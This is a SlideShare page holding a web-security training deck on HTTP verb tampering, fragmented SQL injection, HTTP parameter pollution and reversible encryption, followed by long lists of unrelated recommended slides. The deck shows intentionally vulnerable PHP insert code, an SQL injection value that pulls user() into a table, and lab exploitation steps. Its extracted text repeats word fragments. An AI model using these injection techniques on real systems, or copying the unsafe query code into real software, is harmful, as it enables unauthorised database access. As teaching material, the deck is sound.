SlideShare una empresa de Scribd logo

Web注入+http漏洞等描述

F
fangjiafu
Tecnología
1 de 40
Vulnerabilities in Web – difficulties (masterclass)
Greetings
Questions to discuss • HTTP Verb Tampering • Fragmented SQL Injections • HTTP Parameter Pollution • Reversed encryption
HTTP Verb Tampering HTTP Verb Tampering is an error in access control for HTTP methods. • Administration error • Particular case – vendor’s error vendor’
HTTP Verb Tampering What’s the method? What’ method?
HTTP Verb Tampering Why? Why?
HTTP Verb Tampering Exploitation • Real-live example (Jboss Auth Bypass) Bypass)
HTTP Verb Tampering Exploitation • Practical task http://stat.local/ .htaccess file Result of GET request Result of HACK request
Fragmented SQL Injections SQL injection is an vulnerability caused by incorrect input data application processing. User data transferred via web applications are changed to modify processing. SQL request used for exploitation. exploitation. • Insufficient data filtering
Fragmented SQL Injections What’s the method? What’ method? Do not forget correct filtering ! filtering! Structure of a valid request (MySQL database) database) INSERT INTO table1 (c1,c2) VALUES (‘value1’,’value2’); value1’ value2’ Here is a valid request with injected SQL commands INSERT INTO table1 (c1,c2) VALUES (‘a’ , ’, user()); -- 1’); a’ user()); 1’
Fragmented SQL Injections Why? Why? If there is no filtering for back slash ( “ ” ), an attacker can screen the next symbol by a single or double quote in database request , that do not allow to request, interpret it as a line termination symbol. symbol. The following is required for vulnerability exploitation : exploitation: the request should include more than one string variable . variable. Remember: it’s necessary to filter not only user data, it’ but also data received from databases . databases.
Fragmented SQL Injections Exploitation • Real-life example (Coppermine Photo Gallery <= 1.4.19 ) 1.4.19) GET,POST,REQUEST – “” symbol is not filtered. filtered. You can specify “” in email parameter. Exploitation is possible via a child request to database when you try to access system features after authorization. authorization.
Fragmented SQL Injections Exploitation • Practical task http://tracker.local/index.php http://tracker.local/index.php «Bug tracking system for source code». code»
Fragmented SQL Injections Exploitation • Practical task http://tracker.local/add.php http:// ://tracker.local/add.php Vulnerable code (add.php file): (add.php file) if (isset($_POST['code']) && isset($_POST['fix'])) { $code=htmlspecialchars($_POST['code']); $fix=htmlspecialchars($_POST['fix']); …. mysql_query("INSERT INTO track (bug,fix) VALUES ('".$code."','".$fix."')"); } Database request looks as follows : follows: INSERT INTO track (bug,fix) VALUES ( ‘value1’,’value2’); (‘value1’ value2’
Fragmented SQL Injections Exploitation • Practical task http://tracker.local/add.php http:// ://tracker.local/add.php Vulnerable code (add.php file): file) if (isset($_POST['code']) && isset($_POST['fix'])) { $code=htmlspecialchars($_POST['code']); $fix=htmlspecialchars($_POST['fix']); …. mysql_query("INSERT INTO track (bug,fix) VALUES ('".$code."','".$fix."')"); } Database request looks as follows : follows: INSERT INTO track (bug,fix) VALUES ( ‘value1’, ’, user()) – 1’); (‘value1 user()) 1’
Fragmented SQL Injections Exploitation • Practical task http://tracker.local/view.php Vulnerable code (add.php file): file) if (isset($_POST['code']) && isset($_POST['fix'])) { $code=htmlspecialchars($_POST['code']); $fix=htmlspecialchars($_POST['fix']); …. mysql_query("INSERT INTO track (bug,fix) VALUES ('".$code."','".$fix."')"); } As a result, fix column in track table contents a value that is user() function result.
HTTP Parameter Pollution HTTP Parameter Pollution is a vulnerability caused by a situation that different platforms (web server and web application language ) process sequence of language) HTTP request parameters with the same names differently. differently.
HTTP Parameter Pollution Technology/Environment Interpretation of parameters Example ASP.NET/IIS Binding via comma par1=val1,val2 ASP/IIS Binding via comma par1=val1,val2 PHP/APACHE Последний параметр результирующий par1=val2 PHP/Zeus Last parameter includes result par1=val2 JSP, Servlet/Apache Tomcat First parameter includes result par1=val1 JSP,Servlet/Oracle Application Server 10g First parameter includes result par1=val1 JSP,Servlet/Jetty First parameter includes result par1=val1 IBM Lotus Domino Первый параметр результирующий par1=val1 IBM HTTP Server Last parameter includes result par1=val2 mod_perl,libapeq2/Apache First parameter includes result par1=val1 Perl CGI/Apache First parameter includes result par1=val1 mod_perl/Apache First parameter includes result par1=val1 mod_wsgi (Python)/Apache Returns an array ARRAY(0x8b9058c) Pythin/Zope First parameter includes result par1=val1 IceWarp Returns an array ['val1','val2'] AXIS 2400 Last parameter includes result par1=val2 Linksys Wireless-G PTZ Internet Camera Binding via comma par1=val1,val2 Ricoh Aficio 1022 Printer Last parameter includes result par1=val2 webcamXP Pro First parameter includes result par1=val1 DBMan Binding via 2 tildes par1=val1~~val2
HTTP Parameter Pollution According to PHP web application language . language. An interesting variable variables_order in php.ini configuration file (establishes variable processing ). (establishes processing) Why is it interesting? interesting? GET /?id=1 /?id=1 Cookie: id=2 В итоге: итоге: $_GET[‘id’]=1 $_GET[‘id’ ]=1 $_REQUEST[‘id’]=2 $_REQUEST[‘id’ ]=2 The frequent error in request processing: $_GET is checked, but the value is assigned to from $_REQUEST. checked,
HTTP Parameter Pollution Exploitation • Real-life example (www.blogger.com blog service) service) Vulnerability as a part of «Rewarding web application security research» program research» Error in input setting processing – the first suitable value is checked but result includes the last one. one. Supposedly, vulnerability is in QUERY_STRING check and then in variable declaration made via array data received in the request . request.
HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/index.php
HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/register.php
HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/invite.php
HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/invite.php
HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/invite.php gpc_order (php.ini) – “GPC” GPC”
HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/add.php
Reversible Encryption Reversible encryption in web applications is possibly insecure as it can be used by attackers in: in: • Exploitation of SQL Injection vulnerability ; vulnerability; • Information disclosure (database dump); dump); • Arbitrary file reading; reading; • and so on. on.
Reversible Encryption Exploitation • Practical task http://portal.local http://portal.local
Reversible Encryption Exploitation • Practical task http://portal.local http://portal.local
Reversible Encryption Exploitation • Practical task http://portal.local http://portal.local
Reversible Encryption Exploitation • Practical task http://portal.local/news.php http:// ://portal.local/news.php
Reversible Encryption Exploitation • Practical task http://portal.local/news.php http:// ://portal.local/news.php
Reversible Encryption Exploitation • Practical task http://portal.local/news.php http:// ://portal.local/news.php
Reversible Encryption Exploitation • Practical task http://portal.local/ http:// ://portal.local/
Reversible Encryption Exploitation • Practical task http://portal.local/ http:// ://portal.local/ http://portal.local/xor_tool/
Reversible Encryption Exploitation • Practical task http://portal.local/ http:// ://portal.local/ FAILED.
Reversible Encryption Exploitation • Practical task http://portal.local/ http:// ://portal.local/ 1. “test” user with “12345678910qwerty” password test” 1234567891 qwerty” 2. test : UFBQR1FQRk9cQ0QIFgcRBx0=
Reversible Encryption Exploitation • Practical task http://portal.local/ http:// ://portal.local/ http://portal.local/xor_tool/
Instead of conclusions What’s next? What’ � Try to do practical tasks � Take part in competitions
Thank you for your attention! attention! Questions? ygoltsev@ptsecurity.ru

Recomendados

Java 5 and 6 New Features
Java 5 and 6 New FeaturesJava 5 and 6 New Features
Java 5 and 6 New FeaturesJussi Pohjolainen
 
Introduction to Active Record at MySQL Conference 2007
Introduction to Active Record at MySQL Conference 2007Introduction to Active Record at MySQL Conference 2007
Introduction to Active Record at MySQL Conference 2007Rabble .
 
Java 7 New Features
Java 7 New FeaturesJava 7 New Features
Java 7 New FeaturesJussi Pohjolainen
 
Core Java - Quiz Questions - Bug Hunt
Core Java - Quiz Questions - Bug HuntCore Java - Quiz Questions - Bug Hunt
Core Java - Quiz Questions - Bug HuntCodeOps Technologies LLP
 
Java7 New Features and Code Examples
Java7 New Features and Code ExamplesJava7 New Features and Code Examples
Java7 New Features and Code ExamplesNaresh Chintalcheru
 
55 New Features in Java 7
55 New Features in Java 755 New Features in Java 7
55 New Features in Java 7Boulder Java User's Group
 
JDK1.6
JDK1.6JDK1.6
JDK1.6india_mani
 
DataFX 8 (JavaOne 2014)
DataFX 8 (JavaOne 2014)DataFX 8 (JavaOne 2014)
DataFX 8 (JavaOne 2014)Hendrik Ebbers
 

Recomendados

Java 5 and 6 New Features
Java 5 and 6 New FeaturesJava 5 and 6 New Features
Java 5 and 6 New FeaturesJussi Pohjolainen
 
Introduction to Active Record at MySQL Conference 2007
Introduction to Active Record at MySQL Conference 2007Introduction to Active Record at MySQL Conference 2007
Introduction to Active Record at MySQL Conference 2007Rabble .
 
Java 7 New Features
Java 7 New FeaturesJava 7 New Features
Java 7 New FeaturesJussi Pohjolainen
 
Core Java - Quiz Questions - Bug Hunt
Core Java - Quiz Questions - Bug HuntCore Java - Quiz Questions - Bug Hunt
Core Java - Quiz Questions - Bug HuntCodeOps Technologies LLP
 
Java7 New Features and Code Examples
Java7 New Features and Code ExamplesJava7 New Features and Code Examples
Java7 New Features and Code ExamplesNaresh Chintalcheru
 
55 New Features in Java 7
55 New Features in Java 755 New Features in Java 7
55 New Features in Java 7Boulder Java User's Group
 
JDK1.6
JDK1.6JDK1.6
JDK1.6india_mani
 
DataFX 8 (JavaOne 2014)
DataFX 8 (JavaOne 2014)DataFX 8 (JavaOne 2014)
DataFX 8 (JavaOne 2014)Hendrik Ebbers
 
Jsp/Servlet
Jsp/ServletJsp/Servlet
Jsp/ServletSunil OS
 
JAX-RS and CDI Bike the (Reactive) Bridge
JAX-RS and CDI Bike the (Reactive) BridgeJAX-RS and CDI Bike the (Reactive) Bridge
JAX-RS and CDI Bike the (Reactive) BridgeJosé Paumard
 
Java EE 6 CDI Integrates with Spring & JSF
Java EE 6 CDI Integrates with Spring & JSFJava EE 6 CDI Integrates with Spring & JSF
Java EE 6 CDI Integrates with Spring & JSFJiayun Zhou
 
Modern Programming in Java 8 - Lambdas, Streams and Date Time API
Modern Programming in Java 8 - Lambdas, Streams and Date Time APIModern Programming in Java 8 - Lambdas, Streams and Date Time API
Modern Programming in Java 8 - Lambdas, Streams and Date Time APIGanesh Samarthyam
 
Productive Programming in Java 8 - with Lambdas and Streams
Productive Programming in Java 8 - with Lambdas and Streams Productive Programming in Java 8 - with Lambdas and Streams
Productive Programming in Java 8 - with Lambdas and Streams Ganesh Samarthyam
 
DataFX - JavaOne 2013
DataFX - JavaOne 2013DataFX - JavaOne 2013
DataFX - JavaOne 2013Hendrik Ebbers
 
Pragmatic sbt
Pragmatic sbtPragmatic sbt
Pragmatic sbtHermann Hueck
 
Hibernate
Hibernate Hibernate
Hibernate Sunil OS
 
Java concurrency questions and answers
Java concurrency questions and answers Java concurrency questions and answers
Java concurrency questions and answers CodeOps Technologies LLP
 
Lecture 5 JSTL, custom tags, maven
Lecture 5 JSTL, custom tags, mavenLecture 5 JSTL, custom tags, maven
Lecture 5 JSTL, custom tags, mavenFahad Golra
 
How to execute an oracle stored procedure with nested table as a parameter fr...
How to execute an oracle stored procedure with nested table as a parameter fr...How to execute an oracle stored procedure with nested table as a parameter fr...
How to execute an oracle stored procedure with nested table as a parameter fr...Priyobroto Ghosh (Mule ESB Certified)
 
JavaCro 2014 Scala and Java EE 7 Development Experiences
JavaCro 2014 Scala and Java EE 7 Development ExperiencesJavaCro 2014 Scala and Java EE 7 Development Experiences
JavaCro 2014 Scala and Java EE 7 Development ExperiencesPeter Pilgrim
 
Thinking Beyond ORM in JPA
Thinking Beyond ORM in JPAThinking Beyond ORM in JPA
Thinking Beyond ORM in JPAPatrycja Wegrzynowicz
 
Play!ng with scala
Play!ng with scalaPlay!ng with scala
Play!ng with scalaSiarzh Miadzvedzeu
 
50 new features of Java EE 7 in 50 minutes
50 new features of Java EE 7 in 50 minutes50 new features of Java EE 7 in 50 minutes
50 new features of Java EE 7 in 50 minutesAntonio Goncalves
 
Softshake 2013: 10 reasons why java developers are jealous of Scala developers
Softshake 2013: 10 reasons why java developers are jealous of Scala developersSoftshake 2013: 10 reasons why java developers are jealous of Scala developers
Softshake 2013: 10 reasons why java developers are jealous of Scala developersMatthew Farwell
 
Spring 4 - A&BP CC
Spring 4 - A&BP CCSpring 4 - A&BP CC
Spring 4 - A&BP CCJWORKS powered by Ordina
 
What's new in Scala 2.13?
What's new in Scala 2.13?What's new in Scala 2.13?
What's new in Scala 2.13?Hermann Hueck
 
What is new in java 8 concurrency
What is new in java 8 concurrencyWhat is new in java 8 concurrency
What is new in java 8 concurrencykshanth2101
 
An introduction to SQLAlchemy
An introduction to SQLAlchemyAn introduction to SQLAlchemy
An introduction to SQLAlchemymengukagan
 
Positive Hack Days. Goltsev. Web Vulnerabilities: Difficult Cases
Positive Hack Days. Goltsev. Web Vulnerabilities: Difficult CasesPositive Hack Days. Goltsev. Web Vulnerabilities: Difficult Cases
Positive Hack Days. Goltsev. Web Vulnerabilities: Difficult CasesPositive Hack Days
 
Workshop quality assurance for php projects tek12
Workshop quality assurance for php projects tek12Workshop quality assurance for php projects tek12
Workshop quality assurance for php projects tek12Michelangelo van Dam
 

Más contenido relacionado

La actualidad más candente

Jsp/Servlet
Jsp/ServletJsp/Servlet
Jsp/ServletSunil OS
 
JAX-RS and CDI Bike the (Reactive) Bridge
JAX-RS and CDI Bike the (Reactive) BridgeJAX-RS and CDI Bike the (Reactive) Bridge
JAX-RS and CDI Bike the (Reactive) BridgeJosé Paumard
 
Java EE 6 CDI Integrates with Spring & JSF
Java EE 6 CDI Integrates with Spring & JSFJava EE 6 CDI Integrates with Spring & JSF
Java EE 6 CDI Integrates with Spring & JSFJiayun Zhou
 
Modern Programming in Java 8 - Lambdas, Streams and Date Time API
Modern Programming in Java 8 - Lambdas, Streams and Date Time APIModern Programming in Java 8 - Lambdas, Streams and Date Time API
Modern Programming in Java 8 - Lambdas, Streams and Date Time APIGanesh Samarthyam
 
Productive Programming in Java 8 - with Lambdas and Streams
Productive Programming in Java 8 - with Lambdas and Streams Productive Programming in Java 8 - with Lambdas and Streams
Productive Programming in Java 8 - with Lambdas and Streams Ganesh Samarthyam
 
Hibernate
Hibernate Hibernate
Hibernate Sunil OS
 
Lecture 5 JSTL, custom tags, maven
Lecture 5 JSTL, custom tags, mavenLecture 5 JSTL, custom tags, maven
Lecture 5 JSTL, custom tags, mavenFahad Golra
 
How to execute an oracle stored procedure with nested table as a parameter fr...
How to execute an oracle stored procedure with nested table as a parameter fr...How to execute an oracle stored procedure with nested table as a parameter fr...
How to execute an oracle stored procedure with nested table as a parameter fr...Priyobroto Ghosh (Mule ESB Certified)
 
JavaCro 2014 Scala and Java EE 7 Development Experiences
JavaCro 2014 Scala and Java EE 7 Development ExperiencesJavaCro 2014 Scala and Java EE 7 Development Experiences
JavaCro 2014 Scala and Java EE 7 Development ExperiencesPeter Pilgrim
 
50 new features of Java EE 7 in 50 minutes
50 new features of Java EE 7 in 50 minutes50 new features of Java EE 7 in 50 minutes
50 new features of Java EE 7 in 50 minutesAntonio Goncalves
 
Softshake 2013: 10 reasons why java developers are jealous of Scala developers
Softshake 2013: 10 reasons why java developers are jealous of Scala developersSoftshake 2013: 10 reasons why java developers are jealous of Scala developers
Softshake 2013: 10 reasons why java developers are jealous of Scala developersMatthew Farwell
 
What's new in Scala 2.13?
What's new in Scala 2.13?What's new in Scala 2.13?
What's new in Scala 2.13?Hermann Hueck
 
What is new in java 8 concurrency
What is new in java 8 concurrencyWhat is new in java 8 concurrency
What is new in java 8 concurrencykshanth2101
 
An introduction to SQLAlchemy
An introduction to SQLAlchemyAn introduction to SQLAlchemy
An introduction to SQLAlchemymengukagan
 

La actualidad más candente (20)

Jsp/Servlet
Jsp/ServletJsp/Servlet
Jsp/Servlet
 
JAX-RS and CDI Bike the (Reactive) Bridge
JAX-RS and CDI Bike the (Reactive) BridgeJAX-RS and CDI Bike the (Reactive) Bridge
JAX-RS and CDI Bike the (Reactive) Bridge
 
Java EE 6 CDI Integrates with Spring & JSF
Java EE 6 CDI Integrates with Spring & JSFJava EE 6 CDI Integrates with Spring & JSF
Java EE 6 CDI Integrates with Spring & JSF
 
Modern Programming in Java 8 - Lambdas, Streams and Date Time API
Modern Programming in Java 8 - Lambdas, Streams and Date Time APIModern Programming in Java 8 - Lambdas, Streams and Date Time API
Modern Programming in Java 8 - Lambdas, Streams and Date Time API
 
Productive Programming in Java 8 - with Lambdas and Streams
Productive Programming in Java 8 - with Lambdas and Streams Productive Programming in Java 8 - with Lambdas and Streams
Productive Programming in Java 8 - with Lambdas and Streams
 
DataFX - JavaOne 2013
DataFX - JavaOne 2013DataFX - JavaOne 2013
DataFX - JavaOne 2013
 
Pragmatic sbt
Pragmatic sbtPragmatic sbt
Pragmatic sbt
 
Hibernate
Hibernate Hibernate
Hibernate
 
Java concurrency questions and answers
Java concurrency questions and answers Java concurrency questions and answers
Java concurrency questions and answers
 
Lecture 5 JSTL, custom tags, maven
Lecture 5 JSTL, custom tags, mavenLecture 5 JSTL, custom tags, maven
Lecture 5 JSTL, custom tags, maven
 
How to execute an oracle stored procedure with nested table as a parameter fr...
How to execute an oracle stored procedure with nested table as a parameter fr...How to execute an oracle stored procedure with nested table as a parameter fr...
How to execute an oracle stored procedure with nested table as a parameter fr...
 
JavaCro 2014 Scala and Java EE 7 Development Experiences
JavaCro 2014 Scala and Java EE 7 Development ExperiencesJavaCro 2014 Scala and Java EE 7 Development Experiences
JavaCro 2014 Scala and Java EE 7 Development Experiences
 
Thinking Beyond ORM in JPA
Thinking Beyond ORM in JPAThinking Beyond ORM in JPA
Thinking Beyond ORM in JPA
 
Play!ng with scala
Play!ng with scalaPlay!ng with scala
Play!ng with scala
 
50 new features of Java EE 7 in 50 minutes
50 new features of Java EE 7 in 50 minutes50 new features of Java EE 7 in 50 minutes
50 new features of Java EE 7 in 50 minutes
 
Softshake 2013: 10 reasons why java developers are jealous of Scala developers
Softshake 2013: 10 reasons why java developers are jealous of Scala developersSoftshake 2013: 10 reasons why java developers are jealous of Scala developers
Softshake 2013: 10 reasons why java developers are jealous of Scala developers
 
Spring 4 - A&BP CC
Spring 4 - A&BP CCSpring 4 - A&BP CC
Spring 4 - A&BP CC
 
What's new in Scala 2.13?
What's new in Scala 2.13?What's new in Scala 2.13?
What's new in Scala 2.13?
 
What is new in java 8 concurrency
What is new in java 8 concurrencyWhat is new in java 8 concurrency
What is new in java 8 concurrency
 
An introduction to SQLAlchemy
An introduction to SQLAlchemyAn introduction to SQLAlchemy
An introduction to SQLAlchemy
 

Similar a Web注入+http漏洞等描述

Positive Hack Days. Goltsev. Web Vulnerabilities: Difficult Cases
Positive Hack Days. Goltsev. Web Vulnerabilities: Difficult CasesPositive Hack Days. Goltsev. Web Vulnerabilities: Difficult Cases
Positive Hack Days. Goltsev. Web Vulnerabilities: Difficult CasesPositive Hack Days
 
Workshop quality assurance for php projects tek12
Workshop quality assurance for php projects tek12Workshop quality assurance for php projects tek12
Workshop quality assurance for php projects tek12Michelangelo van Dam
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 
Apollo ecosystem
Apollo ecosystemApollo ecosystem
Apollo ecosystemJames Akwuh
 
Quality Assurance for PHP projects - ZendCon 2012
Quality Assurance for PHP projects - ZendCon 2012Quality Assurance for PHP projects - ZendCon 2012
Quality Assurance for PHP projects - ZendCon 2012Michelangelo van Dam
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Advanced Php - Macq Electronique 2010
Advanced Php - Macq Electronique 2010Advanced Php - Macq Electronique 2010
Advanced Php - Macq Electronique 2010Michelangelo van Dam
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
How and why i roll my own node.js framework
How and why i roll my own node.js frameworkHow and why i roll my own node.js framework
How and why i roll my own node.js frameworkBen Lin
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsPositive Hack Days
 
Building Testable PHP Applications
Building Testable PHP ApplicationsBuilding Testable PHP Applications
Building Testable PHP Applicationschartjes
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 
Laravel for Web Artisans
Laravel for Web ArtisansLaravel for Web Artisans
Laravel for Web ArtisansRaf Kewl
 
用Tornado开发RESTful API运用
用Tornado开发RESTful API运用用Tornado开发RESTful API运用
用Tornado开发RESTful API运用Felinx Lee
 
Javascript first-class citizenery
Javascript first-class citizeneryJavascript first-class citizenery
Javascript first-class citizenerytoddbr
 
Future of Web Apps: Google Gears
Future of Web Apps: Google GearsFuture of Web Apps: Google Gears
Future of Web Apps: Google Gearsdion
 
Workshop quality assurance for php projects - phpbelfast
Workshop quality assurance for php projects - phpbelfastWorkshop quality assurance for php projects - phpbelfast
Workshop quality assurance for php projects - phpbelfastMichelangelo van Dam
 
Workshop quality assurance for php projects - ZendCon 2013
Workshop quality assurance for php projects - ZendCon 2013Workshop quality assurance for php projects - ZendCon 2013
Workshop quality assurance for php projects - ZendCon 2013Michelangelo van Dam
 

Similar a Web注入+http漏洞等描述 (20)

Positive Hack Days. Goltsev. Web Vulnerabilities: Difficult Cases
Positive Hack Days. Goltsev. Web Vulnerabilities: Difficult CasesPositive Hack Days. Goltsev. Web Vulnerabilities: Difficult Cases
Positive Hack Days. Goltsev. Web Vulnerabilities: Difficult Cases
 
Workshop quality assurance for php projects tek12
Workshop quality assurance for php projects tek12Workshop quality assurance for php projects tek12
Workshop quality assurance for php projects tek12
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 
Apollo ecosystem
Apollo ecosystemApollo ecosystem
Apollo ecosystem
 
Quality Assurance for PHP projects - ZendCon 2012
Quality Assurance for PHP projects - ZendCon 2012Quality Assurance for PHP projects - ZendCon 2012
Quality Assurance for PHP projects - ZendCon 2012
 
Sql injection
Sql injectionSql injection
Sql injection
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
Advanced Php - Macq Electronique 2010
Advanced Php - Macq Electronique 2010Advanced Php - Macq Electronique 2010
Advanced Php - Macq Electronique 2010
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
 
How and why i roll my own node.js framework
How and why i roll my own node.js frameworkHow and why i roll my own node.js framework
How and why i roll my own node.js framework
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
 
Building Testable PHP Applications
Building Testable PHP ApplicationsBuilding Testable PHP Applications
Building Testable PHP Applications
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 
Laravel for Web Artisans
Laravel for Web ArtisansLaravel for Web Artisans
Laravel for Web Artisans
 
用Tornado开发RESTful API运用
用Tornado开发RESTful API运用用Tornado开发RESTful API运用
用Tornado开发RESTful API运用
 
Javascript first-class citizenery
Javascript first-class citizeneryJavascript first-class citizenery
Javascript first-class citizenery
 
Future of Web Apps: Google Gears
Future of Web Apps: Google GearsFuture of Web Apps: Google Gears
Future of Web Apps: Google Gears
 
Workshop quality assurance for php projects - phpbelfast
Workshop quality assurance for php projects - phpbelfastWorkshop quality assurance for php projects - phpbelfast
Workshop quality assurance for php projects - phpbelfast
 
Workshop quality assurance for php projects - ZendCon 2013
Workshop quality assurance for php projects - ZendCon 2013Workshop quality assurance for php projects - ZendCon 2013
Workshop quality assurance for php projects - ZendCon 2013
 

Más de fangjiafu

Wce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurityWce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurityfangjiafu
 
Oracle forensics 101
Oracle forensics 101Oracle forensics 101
Oracle forensics 101fangjiafu
 
Understanding and selecting_dsp_final
Understanding and selecting_dsp_finalUnderstanding and selecting_dsp_final
Understanding and selecting_dsp_finalfangjiafu
 
Wce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engWce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engfangjiafu
 
Ddos analizi
Ddos analiziDdos analizi
Ddos analizifangjiafu
 
Bypass dbms assert
Bypass dbms assertBypass dbms assert
Bypass dbms assertfangjiafu
 
Cursor injection
Cursor injectionCursor injection
Cursor injectionfangjiafu
 
Create user to_sysdba
Create user to_sysdbaCreate user to_sysdba
Create user to_sysdbafangjiafu
 
Presentation nix
Presentation nixPresentation nix
Presentation nixfangjiafu
 
Layer 7 ddos
Layer 7 ddosLayer 7 ddos
Layer 7 ddosfangjiafu
 
Tlsoptimizationprint 120224194603-phpapp02
Tlsoptimizationprint 120224194603-phpapp02Tlsoptimizationprint 120224194603-phpapp02
Tlsoptimizationprint 120224194603-phpapp02fangjiafu
 
Presentation nix
Presentation nixPresentation nix
Presentation nixfangjiafu
 
Proper passwordhashing
Proper passwordhashingProper passwordhashing
Proper passwordhashingfangjiafu
 
Burp suite injection中的应用by小冰
Burp suite injection中的应用by小冰Burp suite injection中的应用by小冰
Burp suite injection中的应用by小冰fangjiafu
 
2008 07-24 kwpm-threads_and_synchronization
2008 07-24 kwpm-threads_and_synchronization2008 07-24 kwpm-threads_and_synchronization
2008 07-24 kwpm-threads_and_synchronizationfangjiafu
 

Más de fangjiafu (20)

Wce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurityWce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurity
 
Oracle forensics 101
Oracle forensics 101Oracle forensics 101
Oracle forensics 101
 
Understanding and selecting_dsp_final
Understanding and selecting_dsp_finalUnderstanding and selecting_dsp_final
Understanding and selecting_dsp_final
 
Wce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engWce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_eng
 
Ddos analizi
Ddos analiziDdos analizi
Ddos analizi
 
Bypass dbms assert
Bypass dbms assertBypass dbms assert
Bypass dbms assert
 
Cursor injection
Cursor injectionCursor injection
Cursor injection
 
Create user to_sysdba
Create user to_sysdbaCreate user to_sysdba
Create user to_sysdba
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
 
Layer 7 ddos
Layer 7 ddosLayer 7 ddos
Layer 7 ddos
 
Tlsoptimizationprint 120224194603-phpapp02
Tlsoptimizationprint 120224194603-phpapp02Tlsoptimizationprint 120224194603-phpapp02
Tlsoptimizationprint 120224194603-phpapp02
 
Crypto hlug
Crypto hlugCrypto hlug
Crypto hlug
 
Fp
FpFp
Fp
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
 
Rr 7944
Rr 7944Rr 7944
Rr 7944
 
Proper passwordhashing
Proper passwordhashingProper passwordhashing
Proper passwordhashing
 
Burp suite injection中的应用by小冰
Burp suite injection中的应用by小冰Burp suite injection中的应用by小冰
Burp suite injection中的应用by小冰
 
Oech03
Oech03Oech03
Oech03
 
2008 07-24 kwpm-threads_and_synchronization
2008 07-24 kwpm-threads_and_synchronization2008 07-24 kwpm-threads_and_synchronization
2008 07-24 kwpm-threads_and_synchronization
 
Unit07
Unit07Unit07
Unit07
 

Último

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
